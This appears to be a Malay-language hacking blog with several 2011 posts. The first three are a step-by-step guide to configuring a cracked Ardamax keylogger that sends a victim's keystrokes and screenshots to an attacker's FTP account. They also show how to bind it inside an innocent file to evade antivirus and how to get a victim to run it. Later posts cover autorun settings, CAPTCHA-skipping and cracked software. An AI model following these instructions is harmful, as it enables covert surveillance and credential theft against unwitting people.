Ok semua The Hykerz dan para pembaca..Mr.Hac nak sambung tutorial mengenai kaedah penggunaan Ardamax Keylogger yang Mr.Hac dah bagi korang muat turun sebelum ni di sini ---> Muat Turun Ardamax Keylogger


Apa yang diperlukan?


1. Ardamax Keylogger

2. Akaun Ftp - korang boleh buat secara percuma di sini ---> Drivehq

3. Binder. korang boleh muat turun di sini ---> Perisian Binder Untuk Mematikan Pendeteksian Antivirus Terhadap Keylogger


Kaedah menghantar keylogger kepada mangsa:


1. Selepas pemasangan (installation) Ardamax Keylogger, klik kanan pada ikon dan pilih 'Enter registration key'. masukkan maklumat yang diperlukan (ada disertakan dalam fail yang Hac bagi korang muat turun)



2. Kemudian klik pada ikon dan pilih remote installation, dan klik next dua kali. tandakan kesemua kotak seperti yang ditunjukkan dan klik next.



3. Klik enable dan masukkan kata laluan supaya tiada sesiapa yang dapat membuka keylogger. klik next sebanyak 3 kali dan tandakan send logs every, setkan masa sebagai contoh 5 minit, pilih Ftp sebagai 'delivery method', klik next.



4. Masukkan kesemua maklumat akaun Ftp yang telah dibuat sebentar tadi, klik next.
sebagai contoh Ftp host - ftp.drivehq.com , Remote folder -/logs ,Username - test



5. Ok..sekarang tandakan kesemua kotak, klik next. Setkan masa untuk 'capture screenshot'. klik next, dan tukarkan ikon kepada ikon yang korang mahu, klik next, dan klik Finish.



6. SEKARANG, sila ikuti tutorial untuk menjadikan keylogger ini bebas dari pengesanan virus di sini ---> Perisian Binder Untuk Mematikan Pendeteksian Antivirus Terhadap Keylogger. sekarang, keylogger ini sudah kebal dari ancaman antivirus.

7. Setelah itu, hantarkan keylogger tadi kepada mangsa, sama ada melalui e-mel, ataupun muat naik ke dalam mana-mana web penyimpanan fail seperti mediafire dan minta mangsa untuk memuat turunnya. sebaik sahaja ia dijalankan, setiap keystroke yang telah ditaip oleh mangsa akan dihantarkan ke akaun Ftp korang. boleh juga pilih untuk dihantarkan ke e-mel. tapi buat lah seperti yang Mr.Hac ajarkan ni. lebih mudah..heheheh..



Ok..sila komen! 3 entry HACKING dalam sehari tu!







Muat Turun Ardamax Keylogger




Salam..dalam entry Mr.Hac kali ni Hac nak bagi korang Ardamax Keylogger secara percuma..yaa..percuma!

Tutorial kaedah penggunaan Ardamax Keylogger akan menyusul selepas ini..


Muat turun Ardamax Keylogger di sini ---> Ardamax Keylogger


Sila dapatkan kata laluan di sini ---> Password


Pasang (install) keylogger tadi pada PC korang dan korang akan diminta untuk memasukkan nama beserta serial number..dalam fail yang korang muat turun tu dah ada disertakan sekali..




Perisian Binder Untuk Mematikan Pendeteksian Antivirus Terhadap Keylogger



Salam..ok semua..ini ialah entry susulan kepada Muat Turun Adramax Keylogger..

Apa itu Binder?

Binder ialah perisian yang digunakan untuk menggabungkan/memadatkan dua atau lebih fail dalam satu nama dan ekstensi (extension). Fail yang ingin digabungkan boleh mempunyai pelbagai jenis ekstensi dan ikon. pengguna mempunyai pilihan untuk memilih nama, dan ikon yang berbeza untuk fail yang akan digabungkan. sekiranya fail yang akan digabungkan itu mempunyai aplikasi yang lain
(dalam kes ini ialah keylogger)maka fail tersebut akan turut dijalankan bersama dengan aplikasi keylogger. oleh itu binder digunakan untuk melepasi pengesanan antivirus terhadap keylogger itu.


Bagaimana kaedah penggunaannya?

1. Muat turun dahulu Weekend Binder di sini ---> Weekend Binder 1.0

2. Pasang (install) perisian ini dan korang akan dapat lihat:


3. Kemudian klik pada "Select File #1" dan pilih fail keylogger yang korang ingin BIND bersama dengan fail/aplikasi lain.

4. Klik pada "Select File #2" untuk memilih fail normal yang korang ingin gabungkan bersama dengan keylogger itu tadi.

5. Setelah itu klik pada "Bind" untuk memulakan proses..

6. Jangan lupa untuk menandakan kedua-dua pilihan "Execute" dan korang boleh menggunakan "EXE Pump" untuk menambahkan saiz fail korang kepada nilai yang diingini.

7. Selesai..




Disable Autorun dari USB dan CD (Windows XP)


Salam..hari ni Hac nak tulis pendek je..kaedah nak disable autorun dari USB dan CD..
(takde mood nak tulis panjang-panjang)

Pergi ke Start > Run... > taip gpedit.msc

Korang akan dapat lihat tetingkap Group Policy terbuka..

Pilih Administrative Templates \ System

Korang akan dapat lihat pada panel sebelah kanan bertulis “Turn off Autoplay”

Klik dua kali padanya dan set-kan ia kepada Enabled, dan tukarkan
“Turn off Autoplay on” kepada All Drives.





03 March 2011

Cara Untuk Bypass CAPTCHA


Salam semua The Hykerz dan para pembaca..kali ni Hac nak berkongsi satu alat (tool) untuk melepasi sekatan CAPTCHA pada kebanyakan laman web penyimpan fail seperti Megaupload,ZShare, Rapidshare, Mediafire, Depositfile dan lain-lain..

CAPTCHA ialah singkatan daripada perkataan “Completely Automated Public Turing test to tell Computers and Humans Apart”. Proses memasukkan CAPTCHA adalah sangat membosankan.. Ia sebenarnya digunakan untuk mengelakkan laman dari bots dan spammers..

Salah satu cara untuk melepasi sekatan CAPTCHA ialah dengan menggunakan tool percuma dari skipscreen.com. ia adalah satu add-on untuk Mozilla Firefox..



Muat turun di sini ---> SkipScreen



Berikut adalah video dari laman pembangun perisian ringkas ini..








02 March 2011

Melajukan Buffering Youtube


Salam..untuk entry ni Hac nak kongsikan benda mudah untuk dilakukan..
selalunya kita tengok video di Youtube, perlu pause dulu untuk menunggu ia 'buffering' sampai habis baru boleh tonton, betul tak?

Kali ni, Hac nak kongsikan dengan korang sebuah perisian kecil, yang mampu membantu korang untuk menonton video di Youtube tanpa pause..boleh terus menonton seperti biasa (bergantung kepada kelajuan internet korang juga)..
Caranya ialah dengan menggunakan perisian Bywifi..

Bywifi ni memang ternyata melajukan buffering video di Youtube tanpa perlu menunggu lebih lama..ia lebih bagus dari Speedbit Video Accelerator yang ternyata tidak banyak membantu..

Mari kita sama-sama mencuba..

Klik Di Sini ---> Bywifi


Bywifi ni memang terbaik sebab streaming @ buffering video akan jadi betul-betul laju..

Untuk cara-cara penggunaan, pergi pada link dekat bawah ni:


Bywifi Help


Antara fungsi yang bagus ialah kita boleh setting proxy pada Bywifi..jadi ia sangat mesra dengan Ultrasurf..(sesiapa yang tak tahu Ultrasurf tu ape, sila cari entry Mr.Hac antara yang paling awal..ada Mr.Hac terangkan di situ)



Kredit : Silent Hackers (Forum Hackers Malaysia)





01 March 2011

Safety Folder Version 1.1 (Upgraded) versi Juaratempur


Salam semua..The Hykerz ok? pembaca semua ok?

Jom tengok apa yang Mr.Hac nak kongsikan hari ni..
Semalam Hac ada kongsikan aplikasi Folder yang Selamat (Safety Folder) versi 1.0..
namun ada beberapa cadangan, jadi kami dah melakukan penambahbaikan dari segi coding..
jadi hari ni terimalah versi 1.1 dari My Hackers Are Here a.k.a MyHac..
Eh..biar betul Mr.Hac..baru semalam lancarkan versi 1.0, hari ni dah ada versi 1.1?
Yeee..betul..heheh..

Ada yang tanya Hac betul ke aplikasi ni guna coding 'Mengunci folder tanpa menggunakan perisian'?..ya..betul..memang kami buahsuai...eh...silap..ubah suai dari code tersebut kepada satu aplikasi yang lebih memberi manfaat..sebab kalau coding asal, ia cuma menyorokkan folder..tapi untuk aplikasi ni, kami buat folder tersebut lebih selamat dengan menukarkan ia menjadi folder yang di-rename kepada 'autorun.inf'..dan di dalamnya kami tambahkan dua lagi folder iaitu 'setup.ini' dan 'setup.inf'..

Untuk penerangan lebih lanjut sila pergi sini ---> Kenali Autorun

Untuk pengetahuan korang semua, ia tidak akan berfungsi sebagai sebuah folder untuk korang SOROKKAN fail-fail peribadi korang daripada dilihat oleh orang lain..ianya berfungsi untuk melindungi fail-fail korang yang penting dari dijangkiti oleh virus yang merebak melalui pendrive..

Kalau nak perisian seperti itu, pergi kat sini ---> Folder Lock 6.5.5 Including Key

Ok..untuk aplikasi yang kitorang buat ni, apa yang baru dalam versi 1.1?

- Coding telah diubah suai menjadi lebih kemas dan baik
(coding tidak bertindan)
- ada pilihan untuk memasukkan semula kata laluan yang salah
- Folder MYHAC diubah kepada JUARATEMPUR
(kredit kat bro juaratempur)


Ok..semalam ada cadangan dari bro dgodam untuk pilihan mengubahsuai kata laluan..tapi setelah Team MyHac berbincang, kami rasa biarkan ia seperti itu..sebab? sebabnya dah jelas, aplikasi ini bukan untuk MENYOROKKAN folder korang..jadi letak password sendiri pun tak guna sebab masih boleh diakses dengan menggunakan 'Folder Options...'..
heheheh..jangan kecik ati ye..benda ni kami reka untuk memudahkan korang sebenarnya..tak perlu mengulang perbuatan yang sama setiap kali nak hiddenkan folder, nak un-hide balik..
kemudian nak cipta fail-fail autorun, setup, dan
hidden-kannya, kemudian nak buat coding lagi untuk hilangkan 'button' untuk un-thick 'Hidden' tu lagi..ish..korang faham tak? heheh..

Ok-ok..jangan cakap panjang..muat turun aplikasi Safety Folder version 1.1 di bawah..

Klik Di Sini ---> Safety Folder version 1.1 (juaratempur)

Cara penggunaannya sama sahaja dengan versi 1.0..cuma nama folder aje yang ditukar kepada JUARATEMPUR..kata laluannya masih sama iaitu: mrhac

Soalan cadangan penambahbaikan:

- Nama aplikasi ni yang sedap ape ye nak bagi?
- Korang rasa perlu kata laluan (password) ke? sebab kalau tak nak, versi seterusnya kami buang coding kata laluan tu..
- Kalau nak kata laluan peribadi, sila e-melkan kepada bro JT di juaratempur@yahoo.com